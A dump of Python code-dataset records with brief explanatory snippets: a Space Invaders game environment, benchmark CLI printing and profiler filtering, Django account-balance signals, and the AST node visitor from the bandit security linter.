current_event.type == KEYDOWN:\n\t\t\t\tkey = current_event.key\n\t\t\t\tif key == self.actions['right']:\n\t\t\t\t\tself.game.get_action_right()\n\t\t\t\telif key == self.actions['left']:\n\t\t\t\t\tself.game.get_action_left() \n\t\t\t\telif key == self.actions['space']:\n\t\t\t\t\tself.game.shoot()\n\t\t\t\t#elif key == self.actions['zero']:\n\t\t\t\t#\tself.game.get_no_action()\n\n\tdef game_over(self):\n\t\treturn self.game.lives <= 0\n\t\n\tdef reset_game(self):\n\t\treturn self.game.reset(0,5, newGame=True)\n\n\tdef step(self, dt):\n\t\tself.game_tick += 1\n\t\tdt = dt / 1000.0\n\n\t\tself.score += self.rewards[\"tick\"]\n\t\t\n\t\tif self.game.startGame:\n\t\t\t\tif len(self.game.enemies) == 0:\n\t\t\t\t\tcurrentTime = time.get_ticks()\n\t\t\t\t\tif currentTime - self.game.gameTimer < 3000: \n\t\t\t\t\t\tself.game.screen.blit(self.game.background, (0,0))\n\t\t\t\t\t\tself.game.scoreText2 = Text(FONT, 20, str(self.game.score), GREEN, 85, 5)\n\t\t\t\t\t\tself.game.scoreText.draw(self.game.screen)\n\t\t\t\t\t\tself.game.scoreText2.draw(self.game.screen)\n\t\t\t\t\t\tself.score += self.rewards[\"win\"]\n\t\t\t\t\t\tself.game.nextRoundText.draw(self.game.screen)\n\t\t\t\t\t\tself.game.livesText.draw(self.game.screen)\n\t\t\t\t\t\tself.game.livesGroup.update(self.game.keys)\n\t\t\t\t\t\t# self.check_input()\n\t\t\t\t\t\tself.game.get_state(25)\n\t\t\t\t\t\tself._handle_player_events()\n\t\t\t\t\tif currentTime - self.game.gameTimer > 3000:\n\t\t\t\t\t\t# Move enemies closer to bottom\n\t\t\t\t\t\tself.game.enemyPositionStart += 35\n\t\t\t\t\t\tself.game.reset(self.game.score, self.game.lives)\n\t\t\t\t\t\tself.game.make_enemies()\n\t\t\t\t\t\tself.game.gameTimer += 3000\n\t\t\t\telse:\n\t\t\t\t\tcurrentTime = time.get_ticks()\n\t\t\t\t\t#self.game.play_main_music(currentTime) \n\t\t\t\t\tself.game.screen.blit(self.game.background, (0,0))\n\t\t\t\t\tself.game.allBlockers.update(self.game.screen)\n\t\t\t\t\tself.game.scoreText2 = Text(FONT, 20, str(self.game.score), GREEN, 85, 5)\n\t\t\t\t\tself.game.scoreText.draw(self.game.screen)\n\t\t\t\t\tself.game.scoreText2.draw(self.game.screen)\n\t\t\t\t\tself.game.livesText.draw(self.game.screen)\n\t\t\t\t\t# self.check_input()\n\t\t\t\t\tself.game.get_state(25)\n\t\t\t\t\tself._handle_player_events()\n\t\t\t\t\tself.game.allSprites.update(self.game.keys, currentTime, self.game.killedRow, self.game.killedColumn, self.game.killedArray)\n\t\t\t\t\tself.game.explosionsGroup.update(self.game.keys, currentTime)\n\t\t\t\t\tcheck = self.game.check_collisions()\n\t\t\t\t\tif check == 1:\n\t\t\t\t\t\tself.score += self.rewards[\"win\"] + self.rewards[\"win\"] + self.rewards[\"win\"]\n\t\t\t\t\telif check == 2:\n\t\t\t\t\t\tself.score += self.rewards[\"loss\"]\n\t\t\t\t\t\tself.lives = self.game.lives\n\t\t\t\t\t# else : \n\t\t\t\t\t# \tself.score += self.rewards[\"negative\"]\n\t\t\t\t\tself.game.create_new_ship(self.game.makeNewShip, currentTime)\n\t\t\t\t\tself.game.update_enemy_speed()\n\n\t\t\t\t\tif len(self.game.enemies) > 0:\n\t\t\t\t\t\tself.game.make_enemies_shoot()\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.game.gameOver = True\n\t\t\t\t\t\tself.game.startGame = False\n\t\t\t\t\n\t\telif self.game.gameOver:\n\t\t\tcurrentTime = time.get_ticks()\n\t\t\t# Reset enemy starting position\n\t\t\tself.game.enemyPositionStart = self.game.enemyPositionDefault\n\t\t\tself.game.create_game_over(currentTime)\n\t\t\tself.game.score += self.rewards[\"loss\"]\n\t\t\tself.game.reset(0,3)\n\t\t\tself.lives = 
self.game.lives\n\t\t\t\t\n\t\tdisplay.update()\n\t\tself.game.clock.tick(60)","sub_path":"ple/games/SpaceInvadersPGame/Single player/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":25248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
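`get_state` in the record above is the piece most relevant to learning agents: it discretizes sprite centres into a coarse integer grid, one code per entity type. The same encoding without pygame, with illustrative sprite positions:

```python
# Standalone sketch of the get_state() encoding above: sprite centres are
# bucketed into a coarse grid, one integer code per entity type.
import math
import numpy as np

CODES = {"Ship": 1, "Enemy": 2, "Bullet": 3, "Mystery": 4, "Blocker": 5}

def encode_state(sprites, screen_w=800, screen_h=600, factor=25):
    grid = np.zeros((math.floor(screen_w / factor),
                     math.floor(screen_h / factor)), dtype=int)
    for kind, (cx, cy) in sprites:
        x = math.floor(cx / factor) - 1
        y = math.floor(cy / factor) - 1
        if 0 <= x < grid.shape[0] and 0 <= y < grid.shape[1]:
            grid[x][y] = CODES[kind]
    return grid

state = encode_state([("Ship", (400, 550)), ("Enemy", (200, 100))])
print(state.shape)    # (32, 24)
print(state[15][21])  # 1 -> the ship's cell
```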
+{"seq_id":"500828689","text":"\"\"\"\nUtilities for the CLI we do not want to include into __main__.py\nto not pollute it.\n\"\"\"\n\nfrom setuptools import find_packages\nfrom pkgutil import iter_modules\nimport enum\nimport os\nimport logging\nfrom typing import (\n Optional,\n List,\n Union,\n Tuple,\n TYPE_CHECKING,\n cast,\n Dict,\n Pattern,\n)\nimport inspect\nimport pstats\nimport errno\nimport marshal\nimport re\nif TYPE_CHECKING:\n from ..base import UseCaseResult\n\nfrom .loader import BenchmarkFile\n\nlogger = logging.getLogger(__name__)\n\n_unicode_triangle = \"\\u25B6\"\n\n\nclass Color(enum.Enum):\n\n PURPLE = \"\\033[35m\"\n CYAN = \"\\033[36m\"\n BLUE = \"\\033[34m\"\n GREEN = \"\\033[32m\"\n YELLOW = \"\\033[33m\"\n RED = \"\\033[31m\"\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n END = \"\\033[0m\"\n\n\nclass PrintView:\n\n @staticmethod\n def print(\n *args,\n colors: Union[Color, List[Color], None] = None,\n indent: Union[int, str] = 0,\n ) -> None:\n \"\"\"\n Convenient API for printing colored messages.\n\n Args:\n *args: Messages which should be printed\n colors: Colors from terminal the Color Enum\n indent: How many characters should the message be indented\n \"\"\"\n if not colors:\n colors = []\n elif isinstance(colors, Color):\n colors = [colors]\n if isinstance(indent, int):\n indent = \"\".join([\" \" for _ in range(indent)])\n for message in args:\n print(\"\".join([c.value for c in colors]) + indent\n + message + Color.END.value)\n\n @staticmethod\n def print_divider(message: str = \"\",\n width: Optional[int] = None,\n soft_divider: bool = False,\n **kwargs) -> None:\n # Set width\n window_width = _terminal_size(fallback=(80, 25))[0]\n if width is None or width > window_width:\n width = window_width\n # Trim message if necessary\n message = message.strip()\n if len(message) > width:\n message = message[:width - 4] + \" ...\"\n if message:\n message = \" \" + message + \" \"\n # Create Line to Print\n if soft_divider:\n divider = \"\\u2505\"\n else:\n divider = \"\\u2501\"\n div = \"\".join([divider for _ in range(\n int((width - len(message)) / 2))])\n line = div + message + div\n line += div[:width - len(line)]\n PrintView.print(line, **kwargs)\n\n @staticmethod\n def print_results(\n results: Dict[BenchmarkFile, List[\"UseCaseResult\"]],\n profile_output: str = \"\",\n ) -> None:\n \"\"\"Visualize the File results as a bar graph in the Terminal.\"\"\"\n r: List[\"UseCaseResult\"] = []\n for file, file_results in results.items():\n file_name = os.path.basename(file.file_location)\n PrintView.print(f\"{_unicode_triangle} {file_name}\",\n colors=Color.BOLD)\n grouped_by_name: Dict[str, List[\"UseCaseResult\"]] = {}\n for result in file_results:\n current = grouped_by_name.get(result.use_case_name, [])\n current.append(result)\n grouped_by_name[result.use_case_name] = current\n for uc, rs in grouped_by_name.items():\n PrintView._print_results_of_use_case(\n use_case=uc,\n results=rs,\n profile_output=profile_output,\n )\n r += file_results\n PrintView.print_summary(results=r)\n\n @staticmethod\n def _print_results_of_use_case(use_case: str,\n results: List[\"UseCaseResult\"],\n profile_output: str):\n prefix = \"\\u2514 \"\n if len(results) > 1:\n PrintView.print(prefix + use_case, indent=2)\n for v in results:\n if len(results) == 1:\n name = v.use_case_name\n indent = 2\n else:\n name = v.use_case_params\n indent = 4\n if v.failed:\n PrintView._print_exception(name=name,\n line_prefix=prefix,\n indent=indent,\n exception=v.exception)\n else:\n 
PrintView._print_bar(name=name,\n                                     line_prefix=prefix,\n                                     indent=indent,\n                                     color=_get_bar_color(result=v),\n                                     value=v.operations_per_second,\n                                     goal=v.goal_operations_per_second,\n                                     minimum=v.minimum_operations_per_second,\n                                     name_len=_terminal_size((80, 25))[0] - 40)\n                if v.timed_out:\n                    PrintView._print_time_out(line_prefix=prefix,\n                                              indent=indent + len(prefix),\n                                              timeout=v.timeout)\n                if v.profile_stats is not None:\n                    PrintView._persist_profile(stats=v.profile_stats,\n                                               use_case=v.use_case_name,\n                                               params=v.use_case_params,\n                                               line_prefix=prefix,\n                                               indent=indent + len(prefix),\n                                               profile_output=profile_output)\n\n    @staticmethod\n    def print_summary(results: List[\"UseCaseResult\"]) -> None:\n        \"\"\"\n        Print a line containing a summary of all executed use cases and their\n        results. It will list how many of them were green, yellow and red, how\n        many failed and how many timed out.\n        \"\"\"\n        green = [result for result in results\n                 if _get_bar_color(result) == Color.GREEN]\n        yellow = [result for result in results\n                  if _get_bar_color(result) == Color.YELLOW]\n        red = [result for result in results\n               if _get_bar_color(result) == Color.RED]\n        failed = [result for result in results if result.failed]\n        timed_out = [result for result in results if result.timed_out]\n        bo = Color.BOLD.value\n        gr = Color.GREEN.value\n        ye = Color.YELLOW.value\n        re = Color.RED.value\n        en = Color.END.value\n        PrintView.print_divider()\n        PrintView.print(f\"Summary (Executed {len(results)} Use Cases)\",\n                        colors=Color.BOLD)\n        PrintView.print(f\"{bo}{gr}GOAL{en} {len(green)} Use Cases\")\n        PrintView.print(f\"{bo}{ye}MIN{en} {len(yellow)} Use Cases\")\n        PrintView.print(f\"{bo}{re}NONE{en} {len(red)} Use Cases\")\n        PrintView.print_divider(soft_divider=True)\n        PrintView.print(f\"{bo}{re}Exceptions{en} {len(failed)} Use Cases\")\n        PrintView.print(f\"{bo}{re}Timed Out{en} {len(timed_out)} Use Cases\")\n\n    @staticmethod\n    def _persist_profile(stats: pstats.Stats,\n                         use_case: str,\n                         params: str,\n                         line_prefix: str,\n                         indent: int,\n                         profile_output: str):\n        \"\"\"\n        Filter the profiling stats and persist them to disk.\n        \"\"\"\n        file = (f\"{use_case}_{params}\" if params else use_case) + \".profile\"\n        file = os.path.abspath(os.path.join(profile_output, file))\n        _prepare_directory(file)\n        PrintView.print(f\"{line_prefix}Profile saved to {file}\", indent=indent)\n        # We want to filter out System calls as well as functions that are part\n        # of the Framework\n        stats = _get_cleaned(stats,\n                             filtered_packages=widget_mark_install_path(),\n                             filter_system_calls=True)\n        # Write to file, can be viewed in snakeviz\n        with open(file, \"wb\") as f:\n            marshal.dump(stats, f)\n\n    @staticmethod\n    def _print_exception(name: str,\n                         line_prefix: str,\n                         indent: int,\n                         exception: Optional[Exception],\n                         name_len: int = 45) -> None:\n        reason = type(exception).__name__ if exception else \"Exception\"\n        name_cut = name[:name_len - 5] + \" ... 
\" \\\n if len(name) > name_len else name\n label = (\"{:<\" + str(name_len) + \"}\").format(name_cut).format(name)\n message = f\"{line_prefix}{label}: Failed due to {reason}.\"\n PrintView.print(message, colors=[Color.RED, Color.BOLD], indent=indent)\n\n @staticmethod\n def _print_time_out(timeout: float,\n indent: int,\n line_prefix: str = \"\") -> None:\n message = f\"{line_prefix}Timed out after {timeout} seconds.\"\n PrintView.print(message, colors=[Color.RED, Color.BOLD], indent=indent)\n\n @staticmethod\n def _print_bar(name: str,\n line_prefix: str,\n indent: int,\n color: Color,\n goal: float,\n minimum: float,\n value: float,\n name_len: int = 40):\n label = _prepare_bar_labels(name=name,\n line_prefix=line_prefix,\n indent=indent,\n goal=goal,\n minimum=minimum,\n name_len=name_len)\n bar = _prepare_bars(width=30,\n goal=goal,\n value=value,\n color=color)\n truncated_value = \"{:5.1f}\".format(value)\n print(f\"{label}: {bar} {truncated_value}\")\n\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Private ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\ndef _terminal_size(fallback: Tuple[int, int]) -> Tuple[int, int]:\n \"\"\"\n Try to get the size of the terminal window.\n If it fails, the passed fallback will be returned.\n \"\"\"\n for i in (0, 1):\n try:\n window_width = os.get_terminal_size(i)\n return cast(Tuple[int, int], tuple(window_width))\n except OSError:\n continue\n return fallback\n\n\ndef get_class_that_defined_method(meth):\n try:\n for cls in inspect.getmro(meth.im_class):\n if meth.__name__ in cls.__dict__:\n return cls\n except Exception:\n pass\n return None\n\n\ndef _prepare_bar_labels(name: str,\n line_prefix: str,\n indent: int,\n goal: float,\n minimum: float,\n name_len: int) -> str:\n gr = Color.GREEN.value\n ye = Color.YELLOW.value\n en = Color.END.value\n reference = f\"GOAL={goal}, MIN={minimum}\"\n line_prefix = \"\".join([\" \" for _ in range(indent)]) + line_prefix\n name_cut = name[:name_len - 3 - len(reference) - len(line_prefix)] + \\\n \"...\" if len(name + reference) > name_len else name\n spaces = \"\".join(\".\" for _ in range(\n name_len - len(name_cut + reference + line_prefix)))\n label = line_prefix + name_cut + \", \" + spaces + reference\n label = label.replace(\"GOAL\", f\"{gr}GOAL{en}\")\n label = label.replace(\"MIN\", f\"{ye}MIN{en}\")\n return label\n\n\ndef _prepare_bars(goal: float,\n value: float,\n color: Color,\n width: int) -> str:\n length = round(width * (value / goal))\n if length > width:\n length = width\n elif length < 1:\n length = 1\n blocks = \"\".join([\"\\u2588\" for _ in range(length)])\n space = \"\".join([\" \" for _ in range(width - length)])\n return f\"{color.value}{blocks}{Color.END.value}{space}\"\n\n\ndef _prepare_directory(file: str):\n \"\"\"Prepare the directory where the profile files will be saved in.\"\"\"\n if not os.path.exists(os.path.dirname(file)):\n try:\n os.makedirs(os.path.dirname(file))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef _get_bar_color(result: \"UseCaseResult\") -> Color:\n if result.failed:\n return Color.END\n ops_ps = result.operations_per_second\n goal = result.goal_operations_per_second\n minimum = result.minimum_operations_per_second\n tolerance = result.operations_per_second_tolerance\n if ops_ps + minimum * tolerance < minimum:\n return Color.RED\n elif ops_ps + goal * tolerance < goal:\n return Color.YELLOW\n else:\n return Color.GREEN\n\n\ndef _get_cleaned(stats,\n filtered_packages: Optional[List] = None,\n 
filter_system_calls: bool = False):\n    \"\"\"\n    To make the profiler stats easier to read, we want to filter out:\n    1. Code from Site Packages\n    2. Code belonging to the widgetmark Framework\n\n    Template for the filter was the project:\n    https://github.com/w0rp/filter-profiler-results\n\n    Args:\n        stats: pstats.Stats object whose entries should be filtered\n\n    Returns:\n        Cleaned version of the passed stats\n    \"\"\"\n    name_filter: List[Union[str, Pattern]] = []\n    if filtered_packages is None:\n        filtered_packages = []\n    for package in filtered_packages:\n        name_filter += _find_modules(package)\n    if filter_system_calls:\n        # \"~\" is the pseudo-filename pstats uses for built-ins; \"<...>\"\n        # entries (e.g. frozen modules) are synthetic as well\n        name_filter.append(re.compile(r\"~|<.*>\"))\n    filtered_stats = {\n        key: (nc, cc, tt, ct, {\n            caller_key: timing_tuple\n            for caller_key, timing_tuple in\n            callers.items()\n            if should_include_stats(caller_key, name_filter)\n        })\n        for key, (nc, cc, tt, ct, callers) in stats.stats.items()\n        if should_include_stats(key, name_filter)\n    }\n    return filtered_stats\n\n\ndef should_include_stats(stats_key, filename_filters):\n    filename, line_number, symbol = stats_key\n    for f in filename_filters:\n        if isinstance(f, str) and f in filename:\n            return False\n        elif hasattr(f, \"match\") and re.match(f, filename):\n            return False\n    return True\n\n\ndef widget_mark_install_path() -> List[str]:\n    \"\"\"Get the path where the package widget-mark was installed to.\"\"\"\n    import widgetmark\n    return widgetmark.__path__  # type: ignore  # mypy issue #1422\n\n\ndef _find_modules(path: str):\n    \"\"\"Find all modules of a package.\"\"\"\n    modules = set()\n    for pkg in find_packages(path):\n        for info in iter_modules([os.path.join(path, pkg.replace(\".\", \"/\"))]):\n            if not info.ispkg:\n                modules.add(os.path.join(pkg, info.name))\n    return modules\n","sub_path":"widgetmark/cli/cli_view.py","file_name":"cli_view.py","file_ext":"py","file_size_in_byte":14747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
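`_persist_profile` above marshals the filtered dict in the same layout `pstats` uses on disk, so standard tools can load it back. A minimal round trip with `cProfile` (file names illustrative):

```python
# Round trip: profile something, filter the raw stats dict the way the
# code above does, marshal it, and reload it with pstats.
import cProfile
import marshal
import pstats

cProfile.run("sum(range(10000))", "raw.profile")

stats = pstats.Stats("raw.profile")
kept = {key: value for key, value in stats.stats.items()
        if key[0] != "~"}        # key[0] is the filename; "~" marks built-ins

with open("filtered.profile", "wb") as f:
    marshal.dump(kept, f)

# pstats reads marshalled stats dicts, so viewers like snakeviz work too.
pstats.Stats("filtered.profile").sort_stats("cumulative").print_stats(5)
```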
+{"seq_id":"306185293","text":"from django.contrib.auth.models import User\nfrom .models import Movements, Account_value\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete, post_init\n\n# presave_move_to_account = int()\n# @receiver(post_init, sender=Movements)# this decorator gives me the info before saving\n# def save_to_global(sender, instance, **kwargs):# instance is the sender objet(Movement)\n# print(\"getting in post_init\")\n# global presave_move_to_account \n# presave_move_to_account = instance.move_to_account\n# print(presave_move_to_account)\n\n@receiver(post_save, sender=Movements)#<-this decorator waits until new movement is created to aply account_value update\ndef payment(sender, instance, created, **kwargs):# instance is the sender objet(Movement)\n \"\"\"function for editing a table field after post from a different table\n in this function after adding a new movement is automatically sent the \n signal for updating the account´s related account_value field calculating \n the the current amount after paying or receiving money\n \"\"\"\n if created:\n editor = Account_value.objects.get(id=instance.account_id.id)#instance.this_table_field.foreign_key_field\n instance.account_value_before = editor.account_value\n editor.account_value += instance.amount\n instance.account_value_after = editor.account_value\n editor.save()\n save_without_signal(instance)\n if instance.move_to_account:#Here if we are moving we update the second account. HINT: Move to account is saved as string\n movement_in_second_account(instance, created)\n instance.move_to_account_prestate = True #To know was a movement o not before save we use this function and update it here\n save_without_signal(instance)\n else: #For editing case\n account_value_tmp = update_current_movement(instance, created)\n update_recursively_movements(instance, account_value_tmp)\n \n\n@receiver(post_delete, sender=Movements)\ndef undo_payment(sender, instance, **kwargs):\n print(\"getting in post delete receiver\")\n editor = Account_value.objects.get(id=instance.account_id.id)# ACCOUNT moving the money object\n editor.account_value -= instance.amount#Calculate the new account value\n \n try:#Here we create automatically the movement in the second account if we are moving money.\n #If we get and error at creating the second account movement the first movement is gonna be created anyway, \n #Because of that when deleting that first movement we need to catch the error of second account movement not found\n update_recursively_movements(instance, account_value_tmp=instance.account_value_before)\n if instance.move_to_account:#Here if we are moving we update the second account. 
HINT: Move to account is saved as string\n movement_in_second_account(instance)\n print(\"second account id is: \",instance)\n linked_movement = Movements.objects.get(id = instance.second_account_movement_id)\n delete_without_signal(linked_movement)\n except Exception:\n pass\n\n editor.save()\n\n\n#-----------Functions for signals------------------------\n\ndef update_current_movement(instance, created):\n #Update the amount, account_value_before and account_value_after\n\n # instance = Movements.objects.get(id=instance.id)#get the object of the current movement\n editor = Account_value.objects.get(id=instance.account_id.id)#the second account\n previous_amount = instance.account_value_after - instance.account_value_before#before changing the account_value_before and after we get the previous amount\n editor.account_value -= previous_amount#Undo the previous movement in the account\n editor.account_value += instance.amount#Calculate the new account value if there was a movement\n if instance.move_to_account:#Here if we are moving we update the second account. HINT: Move to account is saved as string\n movement_in_second_account(instance, created, previous_amount)#Update the new amount in the moved-to account\n instance.account_value_after = instance.account_value_before + instance.amount#Save the new account value in the movement for references\n account_value_tmp = instance.account_value_after\n editor.save()\n save_without_signal(instance)\n return account_value_tmp\n\n\ndef update_recursively_movements(instance, account_value_tmp):#Instance is the current movement\n \"\"\"This function updates the account_value_before and account_value_after variables in the rest of the \n account movements, for the paying account and, if applicable, for the receiving account. \n \n OTHER OPTION NOT WORKING WELL: it is not possible to only check i.date > instance.date because movements added\n from the admin can have exactly the same time when the 'save and add another' option is used,\n so it works better to always skip the currently edited movement.\n\n Args:\n instance (Django query object): [Takes the object of the current movement]\n account_value_tmp (int): the account_value_before or after depending on \n the action; for editing the account_value_after is passed, for deleting the account_value_before is needed\n \"\"\"\n account_movements = Movements.objects.filter(account_id = instance.account_id.id)#get all the movements of the instantiated account (the moving account)\n\n # account_value_tmp = int()\n for i in account_movements:#Update the rest of the movements in the moving account\n if i.id > instance.id:#skip all the previous movements including the current one\n print(\"editing\", i)\n i.account_value_before = account_value_tmp\n i.account_value_after = account_value_tmp + i.amount\n account_value_tmp = i.account_value_after\n save_without_signal(i)\n \n if instance.move_to_account:#Update the rest of the movements in the second account\n account_value_tmp = Movements.objects.get(id = instance.second_account_movement_id).account_value_after\n print(\"got in instance.move_to_account\")\n print(\"account value temp is:\", account_value_tmp)\n second_account_movements = Movements.objects.filter(account_id = instance.move_to_account)#get all the movements of the instantiated account (the second account)\n print(second_account_movements)\n for i in second_account_movements:\n print(\"i id is:\", i.id)\n print(\"instance second account movement id is:\", 
instance.second_account_movement_id)\n if i.id > instance.second_account_movement_id:#skip all the previous movements including the current one in the second account\n print(\"editing\", i)\n i.account_value_before = account_value_tmp\n i.account_value_after = account_value_tmp + i.amount\n account_value_tmp = i.account_value_after\n save_without_signal(i)\n \n\n \n\n\ndef save_without_signal(instance):\n \"\"\"Hack to keep the save method from sending a signal, which would create a recursive error. \n EXPLANATION: \n If you look at the django model source code, specifically save_base(), \n you'll see that the pre_save() and post_save() signals are both wrapped in a conditional:\n We can directly manipulate the meta options of a model or instance through\n the _meta API which means we're able to 'disable' the signals from firing by setting \n auto_created = True on the instance we want to save.\n \"\"\"\n instance._meta.auto_created = True\n instance.save()\n instance._meta.auto_created = False\n\ndef delete_without_signal(instance):\n instance._meta.auto_created = True\n instance.delete()\n instance._meta.auto_created = False\n\n\n\ndef movement_in_second_account(instance, created=None, previous_amount=0):\n \"\"\"Here if we are moving we update the second account. HINT: Move to account is saved as string\n\n Args:\n instance (Queryset object): [is the object of the movement the user is operating with]\n created ([Boolean], optional): [description]. Defaults to None to implement the delete statement.\n previous_amount ([Int], optional): [description]. Defaults to 0. This is a necessary variable for editing \n \"\"\"\n account_receiving = Account_value.objects.get(id = instance.move_to_account)\n if created:#For creating\n print(\"getting in movement_in_second_account created\")\n account_receiving.account_value -= instance.amount\n \n elif created == False:#For editing\n if instance.move_to_account_prestate:\n print(\"updating when there was already a movement\")\n print(\"previous amount \", previous_amount)\n print(\"instance amount \", instance.amount)\n account_receiving.account_value += previous_amount#Undo the previous movement in the account\n account_receiving.account_value -= instance.amount#Calculate the new account value\n else:\n print(\"Update when there was not a movement\")\n account_receiving.account_value -= instance.amount#update the second account itself\n else:#For deleting\n print(\"getting in movement_in_second_account deleted\")\n account_receiving.account_value += instance.amount#Undo the previous movement in the account\n second_account_movement(instance, created, account_receiving)\n account_receiving.save()\n \n\n\ndef second_account_movement(instance, created, account_receiving):#Instance: movement moving the money. 
account_receiving: the money receiver account\n #Here we create or edit only the movement done in the second account; the rest of the movements are updated in the update_recursively_movements function\n # instance = Movements.objects.get(id=instance.id)#the account moving the money\n # account_receiving = Account_value.objects.get(id=instance.move_to_account)#the account receiving the money\n def create(instance, account_receiving):\n movement_info = Movements()\n movement_info.account_id = account_receiving\n movement_info.date = instance.date\n movement_info.amount = instance.amount * -1\n movement_info.moved_from_account = instance.account_id.id\n movement_info.message = instance.message\n movement_info.account_value_before = account_receiving.account_value + instance.amount #we use plus because instance.amount is a negative number\n print(account_receiving.account_value,\"....\", instance.amount)\n movement_info.account_value_after = account_receiving.account_value\n movement_info.move_to_account_prestate = True\n print(\"movement info id is: \" ,movement_info.id, type(movement_info.id))\n movement_info.second_account_movement_id = instance.id\n save_without_signal(movement_info)\n instance.second_account_movement_id = movement_info.id#Update the field in the instance after creating the second account movement.\n #We don't need to save it here because it is saved in a future step. If we do it here we create it twice\n if created:\n create(instance, account_receiving)\n elif created == False:\n if instance.move_to_account_prestate:#We update the date, amount and message here. \n #If the idea is to send the money to another account, the user has to delete and create a new movement\n update_the_second_account = Movements.objects.get(id=instance.second_account_movement_id)\n update_the_second_account.date = instance.date\n update_the_second_account.amount = instance.amount * -1\n update_the_second_account.message = instance.message\n update_the_second_account.account_value_after = update_the_second_account.account_value_before + update_the_second_account.amount\n save_without_signal(update_the_second_account)\n else:#the user can't edit a payment to make it a movement; this option is only allowed from the admin panel\n create(instance, account_receiving)\n else:#for deleting, done directly in the post_delete signal.\n pass\n\n\n\n\n\n\n","sub_path":"accounts/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":12116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
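The record above suppresses recursive signal firing by toggling `_meta.auto_created` around `save()`. A more explicit alternative, sketched below under the assumption that the `payment` receiver and the `Movements` model from the record are importable, is to disconnect the receiver for the duration of the save:

```python
# Hedged alternative sketch to the _meta.auto_created hack: temporarily
# disconnect the post_save receiver, save, then reconnect it.
from django.db.models.signals import post_save

def save_without_signal(instance):
    post_save.disconnect(payment, sender=Movements)  # `payment`/`Movements` from the record
    try:
        instance.save()
    finally:
        # reconnect even if save() raises
        post_save.connect(payment, sender=Movements)
```

The `try/finally` guarantees the receiver is reconnected on error, but note this approach is not thread-safe: other threads saving a `Movements` row while the receiver is disconnected will also skip the signal.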
+{"seq_id":"576036566","text":"#!/usr/bin/env python\n\nimport sys\nimport ast, _ast\nimport copy\nfrom bandit import tester as b_tester\nfrom bandit import utils as b_utils\n\nclass BanditNodeVisitor(ast.NodeVisitor):\n\n imports = set()\n import_aliases = {}\n qualname = \"\"\n calldone = False\n logger = None\n results = None\n tester = None\n testset = None\n fname = None\n depth = 0\n\n context = None\n context_template = {'node': None, 'filename': None, 'lineno': None,\n 'name': None, 'qualname': None, 'module': None,\n 'imports': None, 'import_aliases': None, 'call': None}\n\n def __init__(self, fname, logger, metaast, results, testset):\n self.seen = 0\n self.fname = fname\n self.logger = logger\n self.metaast = metaast\n self.results = results\n self.testset = testset\n self.imports = set()\n self.context_template['imports'] = self.imports\n self.import_aliases = {}\n self.context_template['import_aliases'] = self.import_aliases\n self.tester = b_tester.BanditTester(self.logger, self.results, self.testset)\n\n def visit_Call(self, node):\n self.context['lineno'] = node.lineno\n if self.qualname == \"\":\n self.qualname = b_utils.get_call_name(\n node, self.import_aliases)\n self.context['call'] = node\n\n # nested calls\n if type(node.func) == _ast.Attribute:\n if type(node.func.value) == _ast.Call:\n self.qualname = \".\".join([b_utils.get_call_name(\n node.func.value, self.import_aliases), self.qualname])\n else:\n self.calldone = True\n else:\n self.calldone = True\n\n # fill in our context\n if self.qualname is not None:\n self.context['qualname'] = self.qualname\n self.context['name'] = self.qualname.split('.')[-1]\n\n # done with nested\n if (self.calldone):\n self.logger.debug(\"PARSED COMPLETE qualname: %s\" % self.qualname)\n self.logger.debug(\"\\tBASENODE: %s\" % ast.dump(self.context['call']))\n self.qualname = \"\"\n self.calldone = False\n self.tester.run_tests(self.context, 'Call')\n super(BanditNodeVisitor, self).generic_visit(node)\n\n def visit_Import(self, node):\n self.context['lineno'] = node.lineno\n self.logger.debug(\"visit_Import called (%s)\" % ast.dump(node))\n for nodename in node.names:\n if nodename.asname:\n self.context['import_aliases'][nodename.asname] = nodename.name\n self.context['imports'].add(nodename.name)\n self.context['module'] = nodename.name\n self.tester.run_tests(self.context, 'Import')\n super(BanditNodeVisitor, self).generic_visit(node)\n\n def visit_ImportFrom(self, node):\n self.context['lineno'] = node.lineno\n module = node.module\n if module is None:\n return self.visit_Import(node)\n for nodename in node.names:\n if nodename.asname:\n self.context['import_aliases'][nodename.asname] = module + \".\" + nodename.name\n self.context['imports'].add(module + \".\" + nodename.name)\n self.context['module'] = module\n self.context['name'] = nodename.name\n self.tester.run_tests(self.context, 'ImportFrom')\n super(BanditNodeVisitor, self).generic_visit(node)\n\n def visit(self, node):\n self.logger.debug(ast.dump(node))\n self.metaast.add_node(node, '', self.depth)\n self.context = copy.copy(self.context_template)\n self.context['node'] = node\n self.context['filename'] = self.fname\n self.seen += 1\n self.logger.debug(\"entering: %s %s [%s]\" % (hex(id(node)), type(node), self.depth))\n self.depth += 1\n super(BanditNodeVisitor, self).visit(node)\n self.depth -= 1\n self.logger.debug(\"%s\\texiting : %s\" % (self.depth, 
hex(id(node))))\n\n","sub_path":"bandit/node_visitor.py","file_name":"node_visitor.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
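The visitor in this record threads shared context through `ast.NodeVisitor` callbacks and reassembles dotted call names via bandit's helpers. As a compact, runnable illustration of the same traversal pattern, independent of those helpers, the sketch below collects dotted call names from a source string (the source text is an illustrative assumption):

```python
import ast

class CallCollector(ast.NodeVisitor):
    """Collect dotted names of call sites, e.g. 'os.path.join'."""

    def __init__(self):
        self.calls = []

    def visit_Call(self, node):
        # walk Attribute chains down to the root Name, then reverse
        func = node.func
        parts = []
        while isinstance(func, ast.Attribute):
            parts.append(func.attr)
            func = func.value
        if isinstance(func, ast.Name):
            parts.append(func.id)
        self.calls.append(".".join(reversed(parts)))
        self.generic_visit(node)  # keep descending for nested calls

source = "import os\nos.path.join('a', 'b')\n"
collector = CallCollector()
collector.visit(ast.parse(source))
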